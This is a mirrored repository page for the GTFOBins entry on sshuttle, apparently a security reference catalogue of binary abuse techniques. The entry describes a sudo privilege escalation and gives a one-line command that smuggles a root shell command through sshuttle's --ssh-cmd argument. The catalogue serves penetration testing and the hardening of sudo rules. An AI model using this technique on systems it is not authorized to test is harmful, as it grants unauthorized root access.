This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-31 16:58:36 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
11c69d5497c18d783118410b35df76616069c88d
GTFOBins.github.io
/
_gtfobins
/
sshuttle.md
Diego Tellaroli
11c69d5497
Create sshuttle.md
2023-12-21 21:52:14 -03:00
386 B
Raw
Blame
History
functions
functions
sudo
description
code
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id
sudo sshuttle -r root@anything --ssh-cmd "/bin/bash -c 'id>/tmp/root_id'" 192.168.3.3
Reference in New Issue
View Git Blame
Copy Permalink